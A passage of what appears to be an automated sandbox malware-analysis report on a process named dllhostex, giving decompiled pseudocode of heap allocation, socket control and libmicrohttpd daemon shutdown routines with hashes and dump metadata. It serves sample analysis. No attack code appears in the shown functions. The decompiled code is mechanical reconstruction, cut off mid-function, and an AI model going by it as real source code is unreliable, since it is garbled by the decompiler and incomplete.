                                                						 *((intOrPtr*)(_t38 + 0x18)) = _t25;
                                                						goto L10;
                                                					}
                                                					_t37 = 0x13d526c;
                                                					goto L6;
                                                				}
                                                				return 0;
                                                			}


                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 9cf9f44ec78d071c0dcd4b2734b83130d7a0e47d8d88f0ed8d48708d481702fc
                                                • Instruction ID: e633762f3a1984ba6a0e50da89247b4b2eac2a5843a50fdc7ea06541fdd41ff7
                                                • Opcode Fuzzy Hash: 9cf9f44ec78d071c0dcd4b2734b83130d7a0e47d8d88f0ed8d48708d481702fc
                                                • Instruction Fuzzy Hash: A911B4F11053029FE720DF2EE442B5AB7ECEF143ACB20C42EE84AC7649EA71E4448750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 351 1366cca-1366cd5 352 1366cd7-1366ce1 351->352 353 1366ce3-1366ce9 351->353 352->353 354 1366d17-1366d22 call 135eb5c 352->354 355 1366d02-1366d13 RtlAllocateHeap 353->355 356 1366ceb-1366cec 353->356 360 1366d24-1366d26 354->360 357 1366d15 355->357 358 1366cee-1366cf5 call 1365357 355->358 356->355 357->360 358->354 364 1366cf7-1366d00 call 1362eb9 358->364 364->354 364->355
                                                C-Code - Quality: 95%
                                                			E01366CCA(void* __ecx, signed int _a4, signed int _a8) {
                                                				void* _t8;
                                                				void* _t12;
                                                				signed int _t13;
                                                				void* _t15;
                                                				signed int _t18;
                                                				long _t19;
                                                
                                                				_t15 = __ecx;
                                                				_t18 = _a4;
                                                				if(_t18 == 0) {
                                                					L2:
                                                					_t19 = _t18 * _a8;
                                                					if(_t19 == 0) {
                                                						_t19 = _t19 + 1;
                                                					}
                                                					while(1) {
                                                						_t8 = RtlAllocateHeap( *0x13d5654, 8, _t19); // executed
                                                						if(_t8 != 0) {
                                                							break;
                                                						}
                                                						__eflags = E01365357();
                                                						if(__eflags == 0) {
                                                							L8:
                                                							 *((intOrPtr*)(E0135EB5C())) = 0xc;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 = E01362EB9(_t15, __eflags, _t19);
                                                						_pop(_t15);
                                                						__eflags = _t12;
                                                						if(_t12 == 0) {
                                                							goto L8;
                                                						}
                                                					}
                                                					return _t8;
                                                				}
                                                				_t13 = 0xffffffe0;
                                                				if(_t13 / _t18 < _a8) {
                                                					goto L8;
                                                				}
                                                				goto L2;
                                                			}










                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,?,?,01365EBC,00000001,00000364,00000006,000000FF,?,4132269F,0135EB61,01365708,?,?,01363C72), ref: 01366D0B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 93ed170cb1514a653820da9926cef7ac581af888a21f018e436c7cb06a3bccc3
                                                • Instruction ID: 5fa76d2684622b6b3f41f0adb98629f87830d82039a306b79481132d6c59be2f
                                                • Opcode Fuzzy Hash: 93ed170cb1514a653820da9926cef7ac581af888a21f018e436c7cb06a3bccc3
                                                • Instruction Fuzzy Hash: 0EF0B4B15459256BEB215F2AD802B5A7F5CAB607F9F14C021AD089B19CCA60E84086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 367 136571c-1365728 368 136575a-1365765 call 135eb5c 367->368 369 136572a-136572c 367->369 376 1365767-1365769 368->376 371 1365745-1365756 RtlAllocateHeap 369->371 372 136572e-136572f 369->372 373 1365731-1365738 call 1365357 371->373 374 1365758 371->374 372->371 373->368 379 136573a-1365743 call 1362eb9 373->379 374->376 379->368 379->371
                                                C-Code - Quality: 94%
                                                			E0136571C(void* __ecx, long _a4) {
                                                				void* _t4;
                                                				void* _t6;
                                                				void* _t7;
                                                				long _t8;
                                                
                                                				_t7 = __ecx;
                                                				_t8 = _a4;
                                                				if(_t8 > 0xffffffe0) {
                                                					L7:
                                                					 *((intOrPtr*)(E0135EB5C())) = 0xc;
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t8 == 0) {
                                                					_t8 = _t8 + 1;
                                                				}
                                                				while(1) {
                                                					_t4 = RtlAllocateHeap( *0x13d5654, 0, _t8); // executed
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					__eflags = E01365357();
                                                					if(__eflags == 0) {
                                                						goto L7;
                                                					}
                                                					_t6 = E01362EB9(_t7, __eflags, _t8);
                                                					_pop(_t7);
                                                					__eflags = _t6;
                                                					if(_t6 == 0) {
                                                						goto L7;
                                                					}
                                                				}
                                                				return _t4;
                                                			}








                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,01353742,?,?,01297737,00000018,01291009), ref: 0136574E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 1f69097e89ee31c953c59627a1f2a34ec8daf0846c9f207f07979066fcaec728
                                                • Instruction ID: 78a4813f76e80461ea19a5ec9dbdb043da6bd099880f4da2043af830bd27881a
                                                • Opcode Fuzzy Hash: 1f69097e89ee31c953c59627a1f2a34ec8daf0846c9f207f07979066fcaec728
                                                • Instruction Fuzzy Hash: 14E0ED31146225EAE6322A2DAC00B5B3B5CAB217FBF05C030AE1596188DE6CC80086B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E01347F80(void* __ecx, long __edx, void* __edi) {
                                                				signed int _v8;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				void* _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				void _v44;
                                                				signed int _v48;
                                                				void* __esi;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				signed int _t46;
                                                				long _t49;
                                                				signed int _t54;
                                                				signed int _t56;
                                                				void* _t69;
                                                				signed int _t76;
                                                				long _t80;
                                                
                                                				_t82 =  &_v44;
                                                				_t36 =  *0x13cc074; // 0x4132269f
                                                				_v8 = _t36 ^  &_v44;
                                                				_t80 = __edx;
                                                				_t69 = __ecx;
                                                				_t38 =  *(__edx + 0x2c);
                                                				_t54 = _t38;
                                                				 *((char*)(__edx + 0xfc)) = 0;
                                                				_t76 = _t54 & 0x0000000c;
                                                				if((_t38 & 0x01000000) != 0) {
                                                					if(_t76 != 0xc) {
                                                						 *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) + 1;
                                                						_t54 =  *(__edx + 0x2c);
                                                					}
                                                					_t56 = _t54 & 0xfffffffb | 0x00000001;
                                                					 *(_t80 + 0x2c) = _t56;
                                                					if( *((char*)(_t80 + 0xf8)) == 0 &&  *((char*)(_t80 + 0xf9)) == 0) {
                                                						goto L17;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					if(_t76 != 0xc) {
                                                						 *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4)) + 4)) + 1;
                                                						_t54 =  *(__edx + 0x2c);
                                                					}
                                                					_t56 = _t54 & 0xfffffffb | 0x00000001;
                                                					 *(_t80 + 0x2c) = _t56;
                                                					if( *((char*)(_t80 + 0xf8)) != 0 ||  *((char*)(_t80 + 0xf9)) != 0) {
                                                						_v32 = 1;
                                                						_v36 = 1;
                                                						_v44 = 0xffffffff;
                                                						_v40 = 0x7fffffff;
                                                						_v28 =  *(_t80 + 0x34);
                                                						_v20 = 0;
                                                						_v24 = 0x7ff;
                                                						E01344380(0x13d5c40, 0x1347aa0, _t80);
                                                						_t46 =  *0x13d5c1c; // 0x0
                                                						 *0x13d5c0c = 0x103;
                                                						_t73 =  ==  ? _t46 : _t46 & 0xfffffffe;
                                                						_t48 =  !=  ? 0 : 0x13d5c0c;
                                                						_t49 = NtDeviceIoControlFile( *(_t80 + 0x34),  ==  ? _t46 : _t46 & 0xfffffffe, 0,  !=  ? 0 : 0x13d5c0c, 0x13d5c0c, 0x12024,  &_v44, 0x20, 0x13d5c20, 0x20);
                                                						if(_t49 == 0) {
                                                							_t80 = 0;
                                                						} else {
                                                							if(_t49 == 0x103) {
                                                								_t80 = 0x3e5;
                                                							} else {
                                                								_t49 = E013483B0(_t49);
                                                								_t80 = _t49;
                                                							}
                                                						}
                                                						__imp__#112(_t80);
                                                						if(_t80 == 0) {
                                                							goto L19;
                                                						} else {
                                                							__imp__#111();
                                                							if(_t49 != 0x3e5) {
                                                								goto L20;
                                                							} else {
                                                								return E01353717(_v48 ^ _t82, _t80);
                                                							}
                                                						}
                                                					} else {
                                                						L17:
                                                						if((_t56 & 0x00000020) == 0) {
                                                							 *(_t80 + 0x2c) = _t56 | 0x00000020;
                                                							 *(_t80 + 0x28) =  *(_t69 + 0x2c);
                                                							 *(_t69 + 0x2c) = _t80;
                                                						}
                                                						L19:
                                                						L20:
                                                						return E01353717(_v8 ^ _t82, _t80);
                                                					}
                                                				}
                                                			}























                                                APIs
                                                • NtDeviceIoControlFile.NTDLL(?,00000000,00000000,013D5C0C,013D5C0C,00012024,00000001,00000020,013D5C20,00000020), ref: 0134806A
                                                • WSASetLastError.WS2_32(00000000), ref: 01348090
                                                • WSAGetLastError.WS2_32 ref: 0134809A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$ControlDeviceFile
                                                • String ID:
                                                • API String ID: 1013958653-0
                                                • Opcode ID: a4bcc77d5fac70b01e406b3e319f20c87ac8ab177a76aa7626d1c6ceb508e229
                                                • Instruction ID: 5d762145ce81f1ce6259f4701754ba62478c9aff70abf3cb3cc1d53d93fcd586
                                                • Opcode Fuzzy Hash: a4bcc77d5fac70b01e406b3e319f20c87ac8ab177a76aa7626d1c6ceb508e229
                                                • Instruction Fuzzy Hash: DF41E671A107419FE735CF3DD444B2BBBE5EB88718F048A5DE9AAC72C1D7B0A8448B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 19%
                                                			E0134D150(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
                                                				signed int _v4;
                                                				signed int _v8;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				long _v48;
                                                				signed int __esi;
                                                				signed int _t171;
                                                				signed int _t174;
                                                				long* _t176;
                                                				long _t177;
                                                				long _t178;
                                                				void* _t181;
                                                				long _t182;
                                                				signed int _t190;
                                                				signed int _t194;
                                                				signed int _t197;
                                                				signed int _t198;
                                                				void* _t208;
                                                				struct _CRITICAL_SECTION* _t217;
                                                				signed int _t218;
                                                				intOrPtr _t220;
                                                				signed int _t224;
                                                				signed int _t226;
                                                				signed int _t228;
                                                				signed int _t237;
                                                				signed int _t239;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t250;
                                                				signed int _t254;
                                                				void* _t255;
                                                				signed int _t258;
                                                				signed int _t265;
                                                				signed int _t270;
                                                				signed int _t271;
                                                				intOrPtr* _t274;
                                                				signed int _t278;
                                                				long _t279;
                                                				long _t280;
                                                				intOrPtr* _t281;
                                                				signed int _t283;
                                                				signed int _t285;
                                                				signed int _t287;
                                                				void* _t293;
                                                				signed int _t294;
                                                				signed int* _t298;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed int _t303;
                                                				signed int _t310;
                                                				signed int _t312;
                                                				long* _t313;
                                                				signed int _t315;
                                                				signed int _t317;
                                                				signed int _t322;
                                                				signed int _t324;
                                                				intOrPtr* _t327;
                                                				struct _CRITICAL_SECTION* _t329;
                                                				void* _t335;
                                                				void* _t337;
                                                				signed int _t339;
                                                				signed int _t342;
                                                				void* _t343;
                                                				signed int _t344;
                                                				signed int _t345;
                                                				void* _t347;
                                                				void* _t351;
                                                				void* _t352;
                                                				signed int _t356;
                                                				signed int _t357;
                                                
                                                				_t299 = __edi;
                                                				_t293 = __edx;
                                                				_t344 = _t343 - 0xc;
                                                				_push(__ebx);
                                                				_push(_t327);
                                                				_t312 = __ecx;
                                                				_push(__edi);
                                                				_t171 =  *(__ecx + 0xe4);
                                                				_t278 = _t171 >> 0x00000002 & 0xffffff01;
                                                				_t265 = _t171 >> 0x0000000f & 0xffffff01;
                                                				_v8 = _t278;
                                                				_v4 = _t265;
                                                				if((_t171 & 0x00002000) != 0) {
                                                					__ecx = __esi;
                                                					 *((char*)(__esi + 0xc7)) = 1;
                                                					__eax = E0134A8B0(__ebx, __ecx, __edx, __edi);
                                                				}
                                                				EnterCriticalSection(_t312 + 0x9c);
                                                				__eflags = _t265;
                                                				if(_t265 == 0) {
                                                					L96:
                                                					__eflags =  *(_t312 + 0x10);
                                                					if( *(_t312 + 0x10) == 0) {
                                                						goto L82;
                                                					} else {
                                                						 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x183d, "MHD_stop_daemon() called while we have suspended connections.\n");
                                                						_t344 = _t344 + 0x10;
                                                						goto L98;
                                                					}
                                                				} else {
                                                					_t300 =  *(_t312 + 0x14);
                                                					__eflags = _t300;
                                                					if(_t300 == 0) {
                                                						L82:
                                                						_t300 =  *(_t312 + 0xc);
                                                						__eflags = _t300;
                                                						if(_t300 == 0) {
                                                							L89:
                                                							__eflags = _v8;
                                                							_t265 = LeaveCriticalSection;
                                                							if(_v8 == 0) {
                                                								goto L102;
                                                							} else {
                                                								_t300 =  *(_t312 + 0xc);
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									goto L102;
                                                								} else {
                                                									_t327 = CloseHandle;
                                                									goto L92;
                                                								}
                                                							}
                                                						} else {
                                                							_t265 = __imp__#22;
                                                							_t327 = __imp__#111;
                                                							do {
                                                								_t254 =  *_t265( *((intOrPtr*)(_t300 + 0xa0)), 2);
                                                								__eflags =  *(_t312 + 0xe4) & 0x00000004;
                                                								if(( *(_t312 + 0xe4) & 0x00000004) == 0) {
                                                									goto L88;
                                                								} else {
                                                									__eflags =  *((intOrPtr*)(_t312 + 0xbc)) - 0xffffffff;
                                                									if( *((intOrPtr*)(_t312 + 0xbc)) == 0xffffffff) {
                                                										goto L88;
                                                									} else {
                                                										__imp__#19( *((intOrPtr*)(_t312 + 0xc0)), "e", 1, 0);
                                                										__eflags = _t254;
                                                										if(_t254 > 0) {
                                                											goto L88;
                                                										} else {
                                                											_t255 =  *_t327();
                                                											__eflags = _t255 - 0x2733;
                                                											if(_t255 != 0x2733) {
                                                												L98:
                                                												 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1846, "Failed to signal shutdown via inter-thread communication channel");
                                                												_t344 = _t344 + 0x10;
                                                												L99:
                                                												_t300 =  *(_t300 + 4);
                                                												L100:
                                                												__eflags = _t300;
                                                												if(_t300 != 0) {
                                                													L92:
                                                													__eflags =  *((char*)(_t300 + 0xa6));
                                                													if( *((char*)(_t300 + 0xa6)) != 0) {
                                                														goto L99;
                                                													} else {
                                                														LeaveCriticalSection(_t312 + 0x9c);
                                                														_t250 = WaitForSingleObject( *(_t300 + 0x50), 0xffffffff);
                                                														__eflags = _t250;
                                                														if(_t250 != 0) {
                                                															 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1854, "Failed to join a thread\n");
                                                															_t344 = _t344 + 0x10;
                                                															goto L111;
                                                														} else {
                                                															CloseHandle( *(_t300 + 0x50));
                                                															EnterCriticalSection(_t312 + 0x9c);
                                                															 *((char*)(_t300 + 0xa6)) = 1;
                                                															_t300 =  *(_t312 + 0xc);
                                                															goto L100;
                                                														}
                                                													}
                                                												} else {
                                                													L102:
                                                													LeaveCriticalSection(_t312 + 0x9c);
                                                													__eflags = _v4;
                                                													if(_v4 != 0) {
                                                														_t278 = _t312;
                                                														 *((char*)(_t312 + 0xc7)) = 1;
                                                														E0134A8B0(_t265, _t278, _t293, _t300);
                                                													}
                                                													_t174 =  *(_t312 + 0xc);
                                                													__eflags = _t174;
                                                													if(_t174 == 0) {
                                                														L109:
                                                														_t278 = _t312;
                                                														_pop(_t312);
                                                														_pop(_t327);
                                                														_pop(_t265);
                                                														_t344 = _t344 + 0xc;
                                                														_push(_t327);
                                                														_t345 = _t344 & 0xfffffff8;
                                                														_push(_t265);
                                                														_push(_t344);
                                                														_push(_t312);
                                                														_t301 = _t278;
                                                														_t329 = _t301 + 0x9c;
                                                														EnterCriticalSection(_t329);
                                                														_t313 =  *(_t301 + 0x1c);
                                                														_t294 = LeaveCriticalSection;
                                                														if(_t313 == 0) {
                                                															L34:
                                                															return  *_t294(_t329);
                                                														} else {
                                                															_t176 = _t313;
                                                															while(1) {
                                                																_t279 =  *_t313;
                                                																if(_t279 == 0 && _t313 != _t176) {
                                                																	break;
                                                																}
                                                																_t177 = _t313[1];
                                                																if(_t177 != 0) {
                                                																	L9:
                                                																	 *_t177 = _t279;
                                                																	goto L10;
                                                																} else {
                                                																	if(_t313 !=  *(_t301 + 0x18)) {
                                                																		_push("(NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head))");
                                                																		_push(0xbd9);
                                                																		_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																		_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																		L39:
                                                																		_push(E0135B8FA(2));
                                                																		E012938B0(_t280);
                                                																		E0135D32E(_t280, E0135B8FA(2));
                                                																		_t351 = _t345 + 0x20;
                                                																		E0135EBB9(_t265, _t280, _t294, _t301, _t313);
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		_t352 = _t351 - 0x14;
                                                																		__eflags =  *(_t280 + 0xe4) & 0x00000004;
                                                																		_t190 = _t294;
                                                																		_push(_t265);
                                                																		_push(_t329);
                                                																		_push(_t313);
                                                																		_push(_t301);
                                                																		_v44 = _t190;
                                                																		_v48 = _t280;
                                                																		if(( *(_t280 + 0xe4) & 0x00000004) == 0) {
                                                																			__eflags =  *((char*)(_t280 + 0xc8));
                                                																			if( *((char*)(_t280 + 0xc8)) == 0) {
                                                																				_t283 =  *(_t280 + 0x2c);
                                                																				asm("xorps xmm0, xmm0");
                                                																				asm("movlpd [esp+0x18], xmm0");
                                                																				_t191 = 0;
                                                																				_t303 = _v36;
                                                																				_t315 = _v40;
                                                																				__eflags = _t283;
                                                																				while(_t283 != 0) {
                                                																					_t271 =  *(_t283 + 0x90);
                                                																					_t294 =  *(_t283 + 0x94);
                                                																					__eflags = _t271;
                                                																					if(_t271 != 0) {
                                                																						L48:
                                                																						__eflags = _t191;
                                                																						if(_t191 == 0) {
                                                																							L52:
                                                																							_t303 =  *(_t283 + 0x8c);
                                                																							_t315 =  *((intOrPtr*)(_t283 + 0x88)) + _t271;
                                                																							asm("adc edi, edx");
                                                																						} else {
                                                																							_t337 = _t315 -  *((intOrPtr*)(_t283 + 0x88));
                                                																							asm("sbb eax, [ecx+0x8c]");
                                                																							__eflags = _t303 - _t294;
                                                																							if(__eflags >= 0) {
                                                																								if(__eflags > 0) {
                                                																									goto L52;
                                                																								} else {
                                                																									__eflags = _t337 - _t271;
                                                																									if(_t337 > _t271) {
                                                																										goto L52;
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																						_t191 = 1;
                                                																					} else {
                                                																						__eflags = _t294;
                                                																						if(_t294 != 0) {
                                                																							goto L48;
                                                																						}
                                                																					}
                                                																					_t283 =  *(_t283 + 0xc);
                                                																					__eflags = _t283;
                                                																				}
                                                																				_t285 =  *(_v48 + 0x24);
                                                																				__eflags = _t285;
                                                																				if(_t285 == 0) {
                                                																					L63:
                                                																					__eflags = _t191;
                                                																					if(_t191 == 0) {
                                                																						goto L42;
                                                																					} else {
                                                																						goto L64;
                                                																					}
                                                																				} else {
                                                																					_t270 =  *(_t285 + 0x90);
                                                																					_t294 =  *(_t285 + 0x94);
                                                																					__eflags = _t270;
                                                																					if(_t270 != 0) {
                                                																						L58:
                                                																						__eflags = _t191;
                                                																						if(_t191 == 0) {
                                                																							L62:
                                                																							_t303 =  *(_t285 + 0x8c);
                                                																							_t315 =  *((intOrPtr*)(_t285 + 0x88)) + _t270;
                                                																							asm("adc edi, edx");
                                                																						} else {
                                                																							_t191 = _t303;
                                                																							_t335 = _t315 - _t270;
                                                																							asm("sbb eax, edx");
                                                																							__eflags = _t303 -  *(_t285 + 0x8c);
                                                																							if(__eflags >= 0) {
                                                																								if(__eflags > 0) {
                                                																									goto L62;
                                                																								} else {
                                                																									__eflags = _t335 -  *((intOrPtr*)(_t285 + 0x88));
                                                																									if(_t335 >  *((intOrPtr*)(_t285 + 0x88))) {
                                                																										goto L62;
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																						L64:
                                                																						__imp__GetTickCount64();
                                                																						asm("sbb edx, [0x13d5ce4]");
                                                																						_t194 = E01354180(_t191 -  *0x13d5ce0, _t294, 0x3e8, 0);
                                                																						__eflags = _t303 - _t294;
                                                																						if(__eflags > 0) {
                                                																							L68:
                                                																							_t317 = _t315 - _t194;
                                                																							asm("sbb edi, edx");
                                                																							__eflags = _t303 - 0x418937;
                                                																							if(__eflags < 0) {
                                                																								L72:
                                                																								_t197 = _t317;
                                                																								_t198 = _t197 * 0x3e8;
                                                																								_t287 = _t303 * 0x3e8 + (_t197 * 0x3e8 >> 0x20);
                                                																								__eflags = _t287;
                                                																							} else {
                                                																								if(__eflags > 0) {
                                                																									L71:
                                                																									_t198 = _t194 | 0xffffffff;
                                                																									_t287 = _t285 | 0xffffffff;
                                                																								} else {
                                                																									__eflags = _t317 - 0x4bc6a7ef;
                                                																									if(_t317 <= 0x4bc6a7ef) {
                                                																										goto L72;
                                                																									} else {
                                                																										goto L71;
                                                																									}
                                                																								}
                                                																							}
                                                																						} else {
                                                																							if(__eflags < 0) {
                                                																								L67:
                                                																								asm("xorps xmm0, xmm0");
                                                																								asm("movlpd [esp+0x18], xmm0");
                                                																								_t287 = _v36;
                                                																								_t198 = _v40;
                                                																							} else {
                                                																								__eflags = _t315 - _t194;
                                                																								if(_t315 >= _t194) {
                                                																									goto L68;
                                                																								} else {
                                                																									goto L67;
                                                																								}
                                                																							}
                                                																						}
                                                																						_t298 = _v44;
                                                																						 *_t298 = _t198;
                                                																						_t298[1] = _t287;
                                                																						return 1;
                                                																					} else {
                                                																						__eflags = _t294;
                                                																						if(_t294 == 0) {
                                                																							goto L63;
                                                																						} else {
                                                																							goto L58;
                                                																						}
                                                																					}
                                                																				}
                                                																			} else {
                                                																				 *_t190 = 0;
                                                																				 *(_t190 + 4) = 0;
                                                																				return 1;
                                                																			}
                                                																		} else {
                                                																			_push("Illegal call to MHD_get_timeout\n");
                                                																			_push(_t280);
                                                																			E01351E90();
                                                																			_t352 = _t352 + 8;
                                                																			L42:
                                                																			__eflags = 0;
                                                																			return 0;
                                                																		}
                                                																	} else {
                                                																		if(_t177 != 0) {
                                                																			goto L9;
                                                																		} else {
                                                																			 *(_t301 + 0x18) = _t279;
                                                																		}
                                                																		L10:
                                                																		_t280 =  *_t313;
                                                																		_t178 = _t313[1];
                                                																		if(_t280 != 0) {
                                                																			 *(_t280 + 4) = _t178;
                                                																		} else {
                                                																			 *(_t301 + 0x1c) = _t178;
                                                																		}
                                                																		 *_t313 = 0;
                                                																		_t313[1] = 0;
                                                																		 *_t294(_t329);
                                                																		if(( *(_t301 + 0xe4) & 0x00000004) == 0 || _t313[0x29] != 0) {
                                                																			L17:
                                                																			_t180 = _t313[0x36];
                                                																			if(_t313[0x36] != 0) {
                                                																				_t313[0x36] = 0;
                                                																				E0135C9E5(_t180);
                                                																				_t345 = _t345 + 4;
                                                																			}
                                                																			_t265 = _t313[8];
                                                																			if(_t265 != 0) {
                                                																				_t208 =  *_t265;
                                                																				if( *((intOrPtr*)(_t265 + 0x10)) != 0) {
                                                																					VirtualFree(_t208, 0, 0x8000);
                                                																				} else {
                                                																					E0135C9E5(_t208);
                                                																					_t345 = _t345 + 4;
                                                																				}
                                                																				E0135C9E5(_t265);
                                                																				_t345 = _t345 + 4;
                                                																			}
                                                																			_t281 =  *((intOrPtr*)(_t301 + 0x40));
                                                																			if(_t281 != 0) {
                                                																				 *_t281( *((intOrPtr*)(_t301 + 0x44)), _t313,  &(_t313[0xa]), 1);
                                                																				_t345 = _t345 + 0x10;
                                                																			}
                                                																			_t181 = E013490A0(_t265, _t301, _t313[0x13], _t301, _t329, _t313[0x21]);
                                                																			_t280 = _t313[7];
                                                																			_t347 = _t345 + 4;
                                                																			if(_t280 != 0) {
                                                																				E0134D9F0(_t181, _t280);
                                                																				_t313[7] = 0;
                                                																			}
                                                																			_t182 = _t313[0x28];
                                                																			if(_t182 == 0xffffffff) {
                                                																				L30:
                                                																				_t183 = _t313[0x13];
                                                																				if(_t313[0x13] != 0) {
                                                																					E0135C9E5(_t183);
                                                																					_t347 = _t347 + 4;
                                                																				}
                                                																				E0135C9E5(_t313);
                                                																				_t345 = _t347 + 4;
                                                																				EnterCriticalSection(_t329);
                                                																				 *((intOrPtr*)(_t301 + 0xcc)) =  *((intOrPtr*)(_t301 + 0xcc)) - 1;
                                                																				_t294 = LeaveCriticalSection;
                                                																				 *((char*)(_t301 + 0xc6)) = 0;
                                                																				_t313 =  *(_t301 + 0x1c);
                                                																				_t176 = _t313;
                                                																				if(_t313 != 0) {
                                                																					continue;
                                                																				} else {
                                                																					goto L34;
                                                																				}
                                                																			} else {
                                                																				__imp__#3(_t182);
                                                																				if(_t182 != 0) {
                                                																					goto L37;
                                                																				} else {
                                                																					goto L30;
                                                																				}
                                                																			}
                                                																		} else {
                                                																			if(WaitForSingleObject(_t313[0x14], 0xffffffff) != 0) {
                                                																				 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xbdf, "Failed to join a thread\n");
                                                																				_t347 = _t345 + 0x10;
                                                																				L37:
                                                																				 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xc14, "Close socket failed.\n");
